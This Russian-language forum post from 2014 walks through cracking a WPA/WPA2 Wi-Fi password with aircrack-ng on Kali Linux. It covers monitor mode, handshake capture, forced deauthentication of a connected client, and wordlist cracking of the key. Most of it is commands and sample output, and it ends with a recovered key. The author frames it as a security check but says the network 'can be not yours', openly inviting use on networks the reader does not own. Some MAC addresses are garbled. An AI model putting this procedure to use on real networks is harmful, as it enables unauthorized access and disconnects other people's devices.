Взлом wi-fi. Kali linux

  • Автор темы D32R
  • 512
  • Обновлено
  • 24, Mar 2014
  • #1
D этой статье мы попробуем "проверить на безопасность" свою собственную беспроводную точку (Можно не свою)доступа в интернет. И так, приступим...

Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга

Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга.

Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте. Точная процедура включения режима монитора отличается в зависимости от используемого драйвера.

Для определения драйвера, выполните следующую команду: airmon-ng

На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее:

Interface Chipset Driver

rausb0 Ralink RT73 rt73

wlan0 Broadcom b43 - [phy0]

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

Шаг 1а - Настройка MadWifi -NG

Сперва остановим ath0, выполнив:

airmon-ng stop ath0 Должно быть так: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено.

Это должно выглядеть примерно так: lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions. Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга: airmon-ng start wifi0 9

После этой команды мы должны увидеть что-то похожее на:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig

Ответ должен выглядеть так:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retryff RTS thrff Fragment thrff Encryption keyff Power Managementff Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Шаг 1b - Настройка драйверов mac80211 airmon-ng start wlan0 9

Interface Chipset Driver

wlan0 Broadcom b43 - [phy0]

(monitor mode enabled on mon0)

Обратите внимание, что монитор включен на mon0.

Стадия 1С — Настройка прочих драйверов

Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса):

airmon-ng start rausb0 9 Результат Interface Chipset Driver rausb0 Ralink rt73 (monitor mode enabled) Шаг 2 — Начало. Сбор хэндшейков. Целью этого шага является сбор т. н. рукопожатий Выполняем: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 Где: · -с 9 является каналом для беспроводной сети · - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа.

· -w psk является префиксом имени файла вывода

· ath0 является именем нашего интерфейса.

Вот какой будет вывод если беспроводной клиент подключится к сети:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F5:FD:FB:C2 35 0 116

А вот так если не подключится:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа.

Но думаю это не проблема. На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен.

Нам понадобится его MAC-адрес. Откройте другой сеанс консоли и введите: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F



5:FD:FB:C2 ath0
Где: · -0 средство деаутентификации · 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите) · -a 00:14:6C:7E:40:80 МАС-адрес точки доступа · -c 00:0F5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили · ath0 имя интерфейса Вот как будет выглядеть результат команды: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F5:34:30:30]

Шаг 4 — Aircrack-ng - взлом предварительного ключа

На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных.

Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его.

Откройте другой сеанс консоли и введите:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Где:

-w password.lst это имя файла словаря

*.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов.

Вот типичный вывод, когда нет хэндшейков:

Opening psk-01.cap

Opening psk-02.cap

Opening psk-03.cap

Opening psk-04.cap

Read 1827 packets.

No valid WPA handshakes found.

Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход.

Вот таким может быть вывод если хэндшейк будет найден:

Opening psk-01.cap

Opening psk-02.cap

Opening psk-03.cap

Opening psk-04.cap

Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ.

В зависимости от скорости вашего процессора и размера словаря, это может занять много времени.

Вот таким будет вывод при успешном взломе:

Aircrack-ng 0.8

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 12345678 ]

Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Ну вот, ключ у нас.

Беспроводная сеть проверена на безопасность

D32R


Рег
24 Mar, 2014

Тем
7

Постов
9

Баллов
79
Тем
49554
Комментарии
57426
Опыт
552966

Интересно